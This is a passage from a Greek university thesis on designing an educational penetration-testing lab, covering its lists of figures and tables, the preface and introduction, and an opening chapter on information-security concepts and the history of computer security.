Εικόνα 4.3: Μενού επιλογών σάρωσης πολλών υπολογιστών ................................................................... 108 Εικόνα 4.4: Αναφορά Εργαλείου MBSA .................................................................................................... 111 Εικόνα 4.5: Κύρια οθόνη του Cain ............................................................................................................ 128 Εικόνα 4.6: Οθόνη Διαμόρφωσης του Cain .............................................................................................. 129 Εικόνα 4.7: Οθόνη επιτυχούς εγκατάστασης του Abel ............................................................................... 130 Εικόνα 4.8: Η κονσόλα επιλογών του Fast-Track ..................................................................................... 136 Εικόνα 4.9: Η γραφική κονσόλα του Fast-Track ....................................................................................... 136 Εικόνα 4.10: Η αρχιτεκτονική του Metasploit ........................................................................................... 141 Εικόνα 4.11: Η κονσόλα του Metasploit ................................................................................................... 144 Εικόνα 4.12: Δημιουργία προφίλ στο MSAT .............................................................................................. 152 Εικόνα 4.13: Οθόνη για τη δημιουργία μορφότυπου του οργανισμού αξιολόγησης στο MSAT .................. 153 Εικόνα 4.14: Οθόνη έναρξης αξιολόγησης του MSAT ............................................................................... 154 Εικόνα 4.15: Αναφορά του MSAT ............................................................................................................. 154 Εικόνα 4.16: Τρόπος λειτουργίας του Nessus ............................................................................................ 161 Εικόνα 4.17: Κονσόλα του Server Nessus ................................................................................................. 162 Εικόνα 4.18: Είσοδος στο Nessus client .................................................................................................... 162 Εικόνα 4.19: Γραφικό περιβάλλον του Nessus client ................................................................................ 163 Εικόνα 4.20: Καθορισμός πολιτικής ελέγχου στο Nessus .......................................................................... 163 Εικόνα 4.21: Διενέργεια ελέγχου με το Nessus .......................................................................................... 165 Εικόνα 4.22: Αναφορά του Nessus ............................................................................................................ 165 Εικόνα 4.23: Γραμμή εντολών του Nmap .................................................................................................. 173 Εικόνα 4.24: Γραφικό περιβάλλον του Nmap ............................................................................................ 173 Εικόνα 4.25: Κεντρική οθόνη λειτουργίας του Paros Proxy ...................................................................... 182 Εικόνα 4.26: Αναφορά του Paros Proxy ................................................................................................... 183 Εικόνα 4.27: Αρχιτεκτονική του Snort ....................................................................................................... 188 Εικόνα 4.28: Κονσόλα λειτουργίας του Snort ............................................................................................ 189 Εικόνα 4.29: Γραφικό περιβάλλον εμφάνισης των αποτελεσμάτων του Snort ........................................... 190 Εικόνα 4.30: Γραφικό περιβάλλον λειτουργίας του Wireshark .................................................................. 196 Εικόνα 5.1: Τοπολογία δικτύου για τη διεξαγωγή των εργαστηριακών ασκήσεων ..................................... 204

Page 15: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

15 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Ευρετήριο πινάκων Πίνακας 1-1: Καταγεγραμμένα Επεισόδια ασφάλειας ................................................................................ 27

Πίνακας 1-2: Καταγεγραμμένες ευπάθειες πληροφοριακών συστημάτων .................................................... 28

Πίνακας 2-1: Οι διάφορες τεχνολογίες και οι κρίσιμες πληροφορίες που μπορεί να συλλέξει ένας Hacker 49

Πίνακας 2-2: Τύποι ICMP πακέτων ............................................................................................................ 56

Πίνακας 2-3: Σάρωση ping με το εργαλείο nmap ........................................................................................ 56

Πίνακας 2-4: Σάρωση TCP ping με το εργαλείο nmap ................................................................................ 57

Πίνακας 4-1: Απαιτήσεις συστήματος για την εκτέλεση ελέγχων με το εργαλείο MBSA ............................. 100

Πίνακας 4-2: Πρωτόκολλα από τα οποία μπορεί να γίνει σύλληψη ........................................................... 118

Πίνακας 4-3: Διαφορές εμπορική και δωρεάν διανομής του Nessus ......................................................... 156

Πίνακας 4-4: Συγκριτική παρουσίαση μεθόδων Nmap .............................................................................. 176

Πίνακας 4-5: Δικτυακοί τύποι που υποστηρίζονται από το Wireshark ...................................................... 192

Πίνακας 5-1: Εργαλεία και γνωστικό πεδίο που καλύπτουν ...................................................................... 206

Πίνακας 5-2: Τύποι Ασκήσεων .................................................................................................................. 206

Πίνακας 5-3: Βαθμός Δυσκολίας Ασκήσεων ............................................................................................. 207

Page 16: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

16 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Πρόλογος

Η εκρηκτική ανάπτυξη των υπολογιστικών συστημάτων, οι διευρυμένες δυνατότητες για τη

μεταξύ τους διασύνδεση και οι τάσεις παγκοσμιοποίησης άνοιξαν νέους ορίζοντες στην

επικοινωνία, στην εργασία, στην εκπαίδευση, στις συνεργασίες, στο εμπόριο, στην υγεία και

γενικότερα στους περισσότερους τομείς της ανθρώπινης δραστηριότητας. Η νέα αυτή τάξη

πραγμάτων οδήγησε στην εξάρτηση των χρηστών των πληροφοριακών συστημάτων από τις

πληροφορίες που διακινούνται και αποθηκεύονται. Απόρροια αυτού του γεγονότος ήταν η

ανάγκη για την προστασία της αυθεντικότητας, της ακεραιότητας και της εμπιστευτικότητας

των πληροφοριών.

Οι δυνατότητες τις οποίες παρέχει η ψηφιακή εποχή δεν έμειναν ανεκμετάλλευτες από τους

κακόβουλους χρήστες των πληροφοριακών συστημάτων και σύντομα έκανε την εμφάνιση

του το ηλεκτρονικό έγκλημα. Οι ιοί, οι Hackers, η ηλεκτρονική παρακολούθηση, η

ηλεκτρονικές απάτες είναι μερικές από της μορφές του ηλεκτρονικού εγκλήματος. Ποτέ

άλλοτε η ασφάλεια των πληροφοριακών συστημάτων δε ήταν τόσο απαραίτητη όσο σε αυτή

τη νέα πραγματικότητα.

Page 17: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

17 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εισαγωγή

Η παρούσα πτυχιακή εργασία φιλοδοξεί να αποτελέσει μια εμπεριστατωμένη μελέτη για την

ανάπτυξη ενός εργαστηρίου Ελέγχου Τρωτότητας (εφεξής Penetration Testing)

δικτυοκεντρικών πληροφοριακών συστημάτων για εκπαιδευτικούς σκοπούς. Πριν από αυτό

όμως, θα μελετηθεί το φαινόμενο του Hacking και ο ρόλος του Ελέγχου Τρωτότητας στην

ασφάλεια των πληροφοριακών συστημάτων.

Στην εργασία αυτή μελετώνται θέματα που σχετίζονται με τα προβλήματα ασφάλειας των

σύγχρονων πληροφοριακών συστημάτων και εξετάζονται εργαλεία τα οποία συμβάλλουν

στον προσδιορισμό τους. Τα εργαλεία, των οποίων οι δυνατότητες θα αναλυθούν στη

συνέχεια, έχουν επιλεγεί με γνώμονα της καταλληλότητα τους για ένταξη σε ένα

εκπαιδευτικό πρόγραμμα. Παράλληλα, θα αναπτυχθούν περιπτώσεις μελέτης αυτών των

εργαλείων, διαφόρων βαθμών δυσκολίας, κατάλληλες για την επίτευξη των εκπαιδευτικών

σκοπών που έχουν προηγουμένως προσδιοριστεί. Η όλη μελέτη γίνεται προοδευτικά, ώστε ο

αναγνώστης να αποκτήσει σταδιακά το γνωστικό υπόβαθρο, για την κατανόηση των

θεμάτων που περιλαμβάνονται στα επόμενα βήματα. Για το σκοπό αυτό η εργασία είναι

οργανωμένη σε επτά (7) κεφάλαια.

Στο 1ο κεφάλαιο παρουσιάζεται η έννοια της Ασφάλειας Πληροφοριακών Συστημάτων η

οποία βρίσκεται σε αντιστοιχία με τους κινδύνους που τα απειλούν, καθώς και η εξελικτική

της πορεία σε συνάρτηση με την ανάπτυξη της τεχνολογίας. Στη συνέχεια, διερευνώνται τα

αίτια που εκθέτουν σε κίνδυνο τα πληροφοριακά συστήματα, ενώ τονίζεται η ανάγκη για την

δημιουργία πολιτικής ασφάλειας.

Στο 2ο κεφάλαιο μελετάται το φαινόμενο του Hacking και των Hackers. Επιχειρείται αφενός

μια ιστορική αναδρομή της εξελικτικής πορείας του Hacking, αφετέρου ο προσδιορισμός

του μορφότυπου των Hackers. Επιπλέον, παρουσιάζονται αναλυτικά οι τρόποι εργασίας

τους, οι τύποι επιθέσεων, οι μεθοδολογίες και οι τεχνικές που χρησιμοποιούν.

Στο 3ο κεφάλαιο αναλύεται η έννοια του Ελέγχου Τρωτότητας (Penetration Testing) και

περιγράφονται οι μέθοδοι διενέργειάς τους, τα στάδια τα οποία περιλαμβάνουν και η

διαχείρισή τους, όπως έχουν καθοριστεί στα διεθνή πρότυπα. Επιπρόσθετα, γίνεται αναφορά

και στις διαθέσιμες πιστοποιήσεις των αξιολογητών ασφάλειας.

Page 18: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

18 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Στο 4ο κεφάλαιο αναπτύσσονται τα κριτήρια επιλογής των εργαλείων που θα αποτελέσουν

αντικείμενο μελέτης στα πλαίσια του εργαστηρίου, ενώ ταυτόχρονα θα περιγραφούν

αναλυτικά οι δυνατότητες, οι περιορισμοί και ο τρόπος λειτουργίας καθενός από αυτά.

Στο 5ο κεφάλαιο περιγράφονται τα χαρακτηριστικά ενός εργαστηρίου ασφάλειας. Στη

συνέχεια, αναπτύσσεται η δομή του εργαστηρίου αυτού. Παράλληλα, περιγράφονται τα

επιμέρους χαρακτηριστικά του, όπως ο σκοπός του, η υλικοτεχνική υποδομή του, οι γνώσεις

οι οποίες προαπαιτούνται για την παρακολούθησή του, η διαχείρισή του και η αξιολόγηση

των σπουδαστών.

Στο 6ο κεφάλαιο παρουσιάζονται οι εργαστηριακές ασκήσεις που αναπτύχθηκαν για τη

λειτουργία του εργαστηρίου. Για κάθε εργαλείο έχουν σχεδιαστεί τρεις περιπτώσεις μελέτης

με διαβάθμιση δυσκολίας. Ο σχεδιασμός έχει πραγματοποιηθεί με γνώμονα, μέσα από την

αξιοποίηση των δυνατοτήτων του, την επίτευξη του εκπαιδευτικού στόχου.

Στο 7ο κεφάλαιο γίνεται μια ανασκόπηση της εργασίας, εντοπίζονται τα πλεονεκτήματα και

τα μειονεκτήματα του εργαστηρίου που αναπτύχθηκε και προτείνονται τρόποι εφαρμογής

του. Εν κατακλείδι, εξάγονται τα συμπεράσματα της εργασίας και προτάσσονται θέματα για

περαιτέρω έρευνα.

Page 19: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

19 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Κεφάλαιο 1 Πληροφοριακά Συστήματα και Ασφάλεια

1.1 Εισαγωγή

Η εκτεταμένη χρήση της τεχνολογίας, της πληροφορικής και των επικοινωνιών αποτελεί ένα

αδιαμφισβήτητο γεγονός στην εποχή μας. Σχεδόν σε όλους τους τομείς της ανθρώπινης

δραστηριότητας (διακυβέρνηση, υγεία, παιδεία, επιχειρηματικότητα, κλπ) χρησιμοποιούνται

πληροφοριακά συστήματα, αφού τα πλεονεκτήματα που προκύπτουν από τη χρήση τους

είναι σημαντικά. Ταυτόχρονα όμως αυξάνονται και οι κίνδυνοι που απειλούν τα συστατικά

στοιχεία ενός πληροφοριακού συστήματος και κατ’ επέκταση το ίδιο το σύστημα. Οι

κίνδυνοι αφορούν στην παραβίαση της εμπιστευτικότητας, στην ηθελημένη ή τυχαία

καταστροφή ή αλλοίωση, καθώς και στη μη εξουσιοδοτημένη χρήση πληροφοριών και

υπολογιστικών πόρων1

. Η ύπαρξη των κινδύνων προβάλει επιτακτική την ανάγκη για την

Ασφάλεια των Πληροφοριακών Συστημάτων.

Πριν από την εμφάνιση και ευρεία χρήση των πληροφοριακών συστημάτων η ασφάλεια των

πληροφοριών εξασφαλίζονταν με φυσικά και διοικητικά μέσα. Η εισαγωγή όμως της χρήσης

των υπολογιστών, εισήγαγε και την ανάγκη για αυτοματοποιημένα εργαλεία προστασίας

αρχείων και άλλων μορφών πληροφοριών τα οποία βρίσκονται αποθηκευμένα στον

υπολογιστή. Η ανάγκη αυτή γίνεται περισσότερο επιτακτική για υπολογιστικά συστήματα

στα οποία η πρόσβαση μπορεί να πραγματοποιηθεί είτε μέσω ενός τηλεφωνικού δικτύου,

είτε μέσω ενός δικτύου δεδομένων, είτε μέσω του διαδικτύου.

Καθώς τα τεχνολογικά επιτεύγματα εξελίσσονται με ραγδαίους ρυθμούς, εμφανίζονται τα

κατανεμημένα συστήματα, ενώ παράλληλα διευρύνεται η χρήση των δικτυακών και

επικοινωνιακών δυνατοτήτων για τη μεταφορά δεδομένων μεταξύ τερματικού χρήστη και

υπολογιστή ή και μεταξύ δυο υπολογιστών. Οι υπηρεσίες διαδικτύου αποκτούν μια ολοένα

αυξανόμενη ζήτηση, γεγονός που συνάδει με την αύξηση της υπολογιστικής ισχύς, την

επέκταση του εύρους ζώνης και την ανάπτυξη των ασύρματων τεχνολογιών.

1 Γ. Πάγκαλος – Ι. Μαυρίδης, Ασφάλεια Πληροφοριακών Συστημάτων και Δικτύων, Εκδόσεις ΑΝΙΚΟΥΛΑ,

Θεσσαλονίκη 2002.

Page 20: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

20 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Παράλληλα όμως με την εξέλιξη των πληροφοριακών συστημάτων, αυξάνουν και οι

ευπάθειές τους καθώς και ο ι κίνδυνο ι πο υ τα απειλο ύν, γεγονός το οποίο επιτάσσει την

ανάγκη για προστασία τους και εισάγει την έννοια της ασφάλειας πληροφοριακών

συστημάτων. Η ασφάλεια πληροφοριακών συστημάτων σχετίζεται με τα μέτρα τα οποία θα

πρέπει να ληφθούν ώστε να αποθαρρυνθούν, να αποτραπούν, να ανιχνευθούν και να

αντιμετωπιστούν παραβιάσεις ασφάλειας που αφορούν στην μετάδοση πληροφοριών και

στην προστασία των υποδομών.

1.2 Η έννοια της ασφάλειας πληροφοριακών συστημάτων

Η Ασφάλεια Πληροφοριακών Συστημάτων και Υποδομών αφορά οντότητες και αντικείμενα

πο υ αξίζει να προστατευθούν. Ό,τι αξίζει να προστατευθεί ονομάζεται Αγαθό (Asset). Τα

Αγαθά αξίζει να προστατευθούν επειδή έχουν Αξία (Value). Η Αξία τους μπορεί να μειωθεί

αν υποστούν Ζημιά. Τα Αγαθά χρειάζονται προστασία μόνον εάν υπάρχουν Κίνδυνοι

(Dangers) που μπορεί να τους προκαλέσουν Ζημιά (Harm). Ο Ιδιοκτήτης (Owner) ενός

προστατευόμενου Αγαθού χρησιμοποιεί Μέσα Προστασίας (Safeguards) είτε για να μειώσει

τον Κίνδυνο να προξενηθεί Ζημιά στο Αγαθό, είτε για να μειώσει τις συνέπειές της2

.

Οι έννοιες Εμπιστευτικότητα, Ακεραιότητα και Διαθεσιμότητα συνδέονται στενά με την

Ασφάλεια Πληροφοριακών Συστημάτων:

• Εμπιστευτικότητα είναι η αποφυγή της αποκάλυψης πληροφοριών χωρίς την άδεια του

ιδιοκτήτη τους

• Ακεραιότητα είναι η αποφυγή της μη εξουσιοδοτημένης τροποποίησης μιας

πληροφορίας

• Διαθεσιμότητα είναι η αποφυγή μη εύλογων καθυστερήσεων στην εξουσιοδοτημένη

προσπέλαση πληροφοριών και υπολογιστικών πόρων

Η έννοια της ασφάλειας ενός πληροφοριακού συστήματος σχετίζεται με την ικανότητα ενός

οργανισμού να προστατεύει τις πληροφορίες του από τυχόν αλλοιώσεις και καταστροφές,

καθώς και από μη εξουσιοδοτημένη χρήση των πόρων του. Σχετίζεται επίσης με την

ικανότητά του να παρέχει ορθές και αξιόπιστες πληροφορίες, οι οποίες είναι διαθέσιμες

στους εξουσιοδοτημένους χρήστες κάθε φορά που τις αναζητούν. Η ικανότητα αυτή

στηρίζεται στη λήψη μέτρων τα οποία διασφαλίζουν την ακεραιότητα και την

εμπιστευτικότητα των δεδομένων, καθώς και την αδιάλειπτη λειτουργία του δικτύου.

2 Κάτσικας Σ. – Γκρίτζαλης Δ – Γκρίτζαλης Σ., Ασφάλεια Πληροφοριακών Συστημάτων, Εκδόσεις Νέων

Τεχνολογιών, Αθήνα 2004.

Page 21: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

21 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Συνεπώς η ασφάλεια πληροφοριακών συστημάτων σχετίζεται με την πρόληψη και

ανίχνευση μη εξουσιοδοτημένων ενεργειών των χρηστών του συστήματος καθώς και την

λήψη μέτρων.

Η ασφάλεια πληροφοριακών συστημάτων μπορεί ακόμη να οριστεί ως η δυνατότητα ενός

πληροφοριακού συστήματος να αντισταθεί, σε δεδομένο επίπεδο αξιοπιστίας, σε τυχαία

συμβάντα ή κακόβουλες ενέργειες που θέτουν σε κίνδυνο τη διάθεση, την επαλήθευση

ταυτότητας, την ακεραιότητα και την τήρηση του απορρήτου των δεδομένων που έχουν

αποθηκευτεί ή μεταδοθεί καθώς και τις συναφείς υπηρεσίες που παρέχονται είτε είναι

προσβάσιμες μέσω των δικτύων και συστημάτων αυτών.

1.3 Η εξελικτική πορεία της ασφάλειας πληροφοριακών συστημάτων Για να γίνει περισσότερο κατανοητή η έννοια της ασφάλειας πληροφοριακών συστημάτων

κρίνεται απαραίτητη η παρουσίαση της εξελικτικής της πορείας3

.

- 1945

Στις εποχές που τηλεγραφία, τηλεφωνία και ραδιοεπικοινωνίες δεν υφίστανται καν, η

μετάδοση της πληροφορίας δύναται να χαρακτηριστεί από δύσκολο έως και ακατόρθωτο

εγχείρημα, καθώς η αναχαίτιση, ακόμα και η καταστροφή ενός μηνύματος είναι σύνηθες

φαινόμενο. Επιπρόσθετα η απόσταση αποτελεί ανασταλτικό παράγοντα, όσο μεγαλώνει,

τόσο μικραίνουν οι πιθανότητες ορθής λήψης του μηνύματος.

Περίπου μέχρι το τέλος του Β’ Παγκόσμιου Πολέμου η έννοια της ασφάλειας ταυτίζεται με

τη διασφάλιση του περιεχομένου του μηνύματος σε περίπτωση παρεμβολής.

Πριν την κατασκευή και την εξέλιξη των υπολογιστικών συστημάτων με τη μορφή που

παρουσιάζουν έως τις μέρες μας, η ασφάλεια της πληροφορίας προβάλλει συνυφασμένη με

την ανάγκη ασφαλών στρατιωτικών και πολιτικών επικοινωνιών.

Η μελέτη, η ανάπτυξη καθώς και η χρήση κωδικών και κωδικοποιητών συνιστούν επιτυχή,

σε αρκετές περιπτώσεις, τρόπο διασφάλισης του μηνύματος. Οι κώδικες, εξαιτίας της

ευκολότερης υλοποίησης τους σε σχέση με τους κωδικοποιητές, υλοποιούν τη βασική

ασφαλή επικοινωνία. Σε περίπτωση, ωστόσο, υποκλοπής του βιβλίου κωδικών το οποίο θα

3 Strebe M., Network Security Foundations, Sybex Inc, Alameda, 2004, σελ. 5 – 13.

Page 22: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

22 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

έπρεπε να είναι γνωστό και στις δυο πλευρές μετάδοσης – λήψης του μηνύματος, η

επικοινωνία οφείλει να αποκατασταθεί αμέσως με νέο βιβλίο κωδικών.

1945 – 1955

Οι πρώτοι ηλεκτρονικοί υπολογιστές είναι ογκώδεις, με περιορισμένες δυνατότητες –

υπολογιστική ισχύς μικρότερη από μια απλή σημερινή αριθμομηχανή – υψηλό κόστος και

πολύτιμο λειτουργικό κύκλο. Η ασφάλεια των υπολογιστών αυτού του τύπου προτάσσεται

ως περιττή, εφόσον προέχει η διασφάλιση της λειτουργίας τους και η επίλυση άλλων

προβλημάτων. Επιπρόσθετα, για να μπορέσει κάποιος να βλάψει αυτά τα συστήματα θα

έπρεπε αφενός να έχει φυσική πρόσβαση σε αυτά και αφετέρου να έχει πολύ καλή γνώστης

της λειτουργίας τους.

1955 – 1965

Πρόκειται για τη χρονική περίοδο κατά την οποία τα υπολογιστικά συστήματα εισβάλουν

στις μεγάλες επιχειρήσεις. Τα θέματα ασφάλειας τα οποία προκύπτουν σχετίζονται με την

περίπτωση οποιουδήποτε υπαλλήλου ο οποίος μπορεί να επιφέρει καταστροφή στο σύστημα

λόγω δυσαρέσκειάς του προς την επιχείρηση. Επιπλέον ενδιαφέρει ιδιαίτερα και η αποτροπή

δυνητικής πρόσβασης διαφόρων ανταγωνιστών της επιχείρησης. Προέχει, ωστόσο, η φυσική

προστασία των συστημάτων, παρά του λογισμικού. Κάποιο είδος πραγματικής ασφάλειας

δεν υφίσταται. Παράλληλα, οι λογαριασμοί χρηστών και τα συνθηματικά είναι απλοί και

επικεντρώνονται στο ποιος χρήστης κάνει ποιες ενέργειες μέσα στο σύστημα, χωρίς να

υπάρχει κάποιος κίνδυνος κακόβουλης εξωτερικής εισβολής.

1965 – 1975

Κατά τα τέλη της δεκαετίας του ’60 και τις αρχές του ’70 το θέμα «υπευθυνότητα»

αναφορικά με την ασφάλεια γίνεται όλο και πιο σημαντικό, καθώς οι υπολογιστές

εξελίσσονται και οι χρήστες το υς γίνο νται πολυάριθμο ι. Η εφαρμογή δύο τύπων

λογαριασμών χρηστών, οι οποίοι προστατεύονται από κωδικούς πρόσβασης, του απλού, με

περιορισμένα δικαιώματα χρήστη και του διαχειριστή με απεριόριστα, εγκαθιδρύεται με

σκοπό την αποτροπή του τυπικού χρήστη από την οποιανδήποτε αλλοίωση τόσο των

δεδομένων όσο και του ίδιου του συστήματος. Οι χρήστες με δικαιώματα διαχειριστή

οφείλουν να πράττουν οτιδήποτε κρίνεται αναγκαίο για το σύστημα. Ένα από τα

σημαντικότερα καθήκοντά τους είναι η αλλαγή του προεπιλεγμένου εργοστασιακού

συνθηματικού πρόσβασης σε έναν υπολογιστή, τακτική που εφαρμόζεται ακόμα και σήμερα

κυρίως σε δικτυακές συσκευές.

Page 23: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

23 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Την ίδια χρονική περίοδο ξεκινά και η έρευνα για τα λειτουργικά συστήματα. Στην πορεία

κάποια λειτουργικά συστήματα κεντρικών υπολογιστών, όπως το Multics, άρχισαν να

προσαρμόζονται σε μια ποικιλία μικρότερων εμπορικών μηχανημάτων, όπως τους μίνι-

υπολογιστές και τα πρώτα συστήματα ενός χρήστη που ονομαζόταν σταθμοί εργασίας. Μια

νέα έκδοση του Multics κάνει την εμφάνισή της και έχει το όνομα Unix.

Οι πρώτες παράνομες ενέργειες από κακόβουλους προγραμματιστές, όπως η συγγραφή

συστημάτων κερκόπορτας (backdoor) στα προγράμματά τους, αρχίζουν να εμφανίζονται.

1975 – 1985

Η ανάγκη για την ασφάλεια των πληροφοριακών συστημάτων έγινε εμφανής τη δεκαετία

του ’70. Είναι η εποχή που οι εταιρείες αρχίζουν να χρησιμοποιούν την απομακρυσμένη

προσπέλαση, όπου χρήστες τερματικών συνδέονταν με τους κεντρικούς υπολογιστές μέσω

του τηλεφωνικού δικτύου, με τη χρήση μόντεμ. Παράλληλα, αναπτύσσονται οι

μικροεπεξεργαστές και κάνουν την εμφάνισή τους τα πρώτα PCs. Τα δύο αυτά γεγονότα

συντελούν στην γέννηση της τέχνης και της τεχνικής της εισβολής. Οι εισβολείς

χρησιμοποιούν τους υπολογιστές για να κάνουν συνεχείς κλήσεις σε μια περιοχή αριθμών

τηλεφώνων, συνήθως νυχτερινές ώρες, και όταν κάποιος καλούμενος υπολογιστής

απαντούσε, εκτυπώνονταν ο αριθμό τηλεφώνου και διακόπτονταν η κλήση. Οι εισβολείς στη

συνέχεια δοκίμαζαν τα τηλέφωνα που είχαν συλλέξει με την προηγούμενη μέθοδο,

ψάχνοντας για κεντρικούς υπολογιστές των οποίων τα συνθηματικά ήταν τα προεπιλεγμένα

εργοστασιακά και κατά συνέπεια μπορούσαν εύκολα να παραβιαστούν, παρέχοντάς τους

πρόσβαση στα πληροφοριακά συστήματα των εταιρειών.

Ως αντίμετρο για τα παραπάνω χρησιμοποιήθηκε η ασφάλεια επανάκλησης, σύμφωνα με

την οποία ο καλούμενος υπολογιστής δέχεται μόνο έναν αριθμό τηλεφώνου από τον

καλούντα υπολογιστή και διακόπτει την κλήση. Στη συνέχεια το σύστημα ελέγχει αυτόν τον

αριθμό τηλεφώνου από μια λίστα αποδεκτών αριθμών και αν βρίσκεται μέσα σε αυτή, το

σύστημα επανακαλεί τον υπολογιστή από τον οποίο δέχτηκε την κλήση. Οι εισβολείς,

παρόλα αυτά, είχαν τη δυνατότητα να αναδρομολογούν τις κλήσεις χειρωνακτικά,

εισβάλοντας σε υπολογιστές της τηλεφωνικής εταιρείας, αλλά αυτό απαιτούσε γνώσεις και

δεδομένου ότι δεν υπήρχαν οι ομάδες συζητήσεων (forums) το φαινόμενο ήταν σπάνιο. Η

ασφάλεια επανάκλησης έλυσε το πρόβλημα μέχρι περίπου τα μέσα της δεκαετίας του ’80.

Ένα άλλο σημαντικό γεγονός αυτής της περιόδου είναι οι μελέτες που γίνονται από το

στρατό για τη δημιουργία δικτύων δρομολόγησης πακέτων, όπου μεμονωμένα μικρά

Page 24: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

24 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

μηνύματα μπορούσαν να μεταδίδονται ανάμεσα σε δύο τερματικά συστήματα και να

δρομολογούνται από ενδιάμεσα συστήματα με ένα χαλαρά ιεραρχικό τρόπο, επιτρέποντας

έτσι σε οποιονδήποτε βρισκόταν στο δίκτυο να επικοινωνεί με τους άλλους. Ο στρατός

